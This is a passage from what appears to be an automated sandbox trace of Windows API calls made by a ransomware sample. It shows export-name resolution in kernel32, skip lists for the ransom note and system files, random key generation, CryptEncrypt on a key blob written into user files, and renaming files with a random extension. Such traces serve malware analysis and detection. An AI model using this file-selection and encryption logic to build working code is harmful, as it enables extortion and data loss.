(lpString="DELETETIMERQUEUE") returned 16 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.716] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.716] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.716] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.716] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.716] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.716] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.716] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.717] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.717] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.717] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.717] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.717] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.717] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.717] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.717] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.717] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.717] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.717] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.717] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.718] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.718] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.718] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.718] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.718] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.718] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.718] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.718] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.718] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.718] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.718] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.718] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.718] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.718] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.718] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.719] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\cZLwBD2he.gif") returned 64 [0086.719] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\cZLwBD2he.gif.YSnJCy1") returned 72 [0086.719] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\cZLwBD2he.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\czlwbd2he.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\cZLwBD2he.gif.YSnJCy1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\czlwbd2he.gif.ysnjcy1"), dwFlags=0x0) returned 1 [0086.719] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.720] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.720] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.720] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafc916e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xafc916e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xafc916e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0086.720] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0086.720] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f7a0350, ftCreationTime.dwHighDateTime=0x1d4cd70, ftLastAccessTime.dwLowDateTime=0x908fc050, ftLastAccessTime.dwHighDateTime=0x1d4c817, ftLastWriteTime.dwLowDateTime=0x908fc050, ftLastWriteTime.dwHighDateTime=0x1d4c817, nFileSizeHigh=0x0, nFileSizeLow=0xaad6, dwReserved0=0x0, dwReserved1=0x0, cFileName="EeWqUR.gif", cAlternateFileName="")) returned 1 [0086.720] lstrcmpiW (lpString1="EeWqUR.gif", lpString2="DECRYPT-FILES.txt") returned 1 [0086.720] lstrcmpiW (lpString1="EeWqUR.gif", lpString2="autorun.inf") returned 1 [0086.720] lstrcmpiW (lpString1="EeWqUR.gif", lpString2="boot.ini") returned 1 [0086.720] lstrcmpiW (lpString1="EeWqUR.gif", lpString2="desktop.ini") returned 1 [0086.720] lstrcmpiW (lpString1="EeWqUR.gif", lpString2="ntuser.dat") returned -1 [0086.720] lstrcmpiW (lpString1="EeWqUR.gif", lpString2="iconcache.db") returned -1 [0086.721] lstrcmpiW (lpString1="EeWqUR.gif", lpString2="bootsect.bak") returned 1 [0086.721] lstrcmpiW (lpString1="EeWqUR.gif", lpString2="ntuser.dat.log") returned -1 [0086.721] lstrcmpiW (lpString1="EeWqUR.gif", lpString2="thumbs.db") returned -1 [0086.721] lstrcmpiW (lpString1="EeWqUR.gif", lpString2="Bootfont.bin") returned 1 [0086.721] lstrlenW (lpString="EeWqUR.gif") returned 10 [0086.721] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0086.721] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0086.721] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0086.721] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0086.721] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.721] lstrlenW (lpString="EeWqUR.gif") returned 10 [0086.721] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0086.721] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="EeWqUR.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\EeWqUR.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\EeWqUR.gif" [0086.721] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\EeWqUR.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\eewqur.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.721] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=43734) returned 1 [0086.721] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.721] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.722] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.722] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.722] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.722] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.722] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.723] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.723] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.724] CloseHandle (hObject=0x42c) returned 1 [0086.724] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.724] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.725] CloseHandle (hObject=0x0) returned 0 [0086.725] CloseHandle (hObject=0x428) returned 1 [0086.725] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.725] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.725] GetTickCount () returned 0x114e216 [0086.726] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.726] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.726] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.726] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.726] lstrlenA (lpString="kernel32.dll") returned 12 [0086.727] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.727] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.727] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.727] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.727] lstrlenA (lpString="ADDATOMA") returned 8 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.727] lstrlenA (lpString="ADDATOMW") returned 8 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.727] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.727] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.727] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.727] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.727] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.727] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.727] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.727] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.727] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.727] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.727] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.728] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.728] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.728] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.728] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.728] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.728] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.728] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.728] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.728] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.728] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.728] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.728] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.728] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.728] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.728] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.728] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.728] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.728] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.729] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.729] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.729] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.729] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.729] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.729] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.729] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.729] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.729] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.729] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.729] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.729] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.729] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.729] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.729] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.729] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.729] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 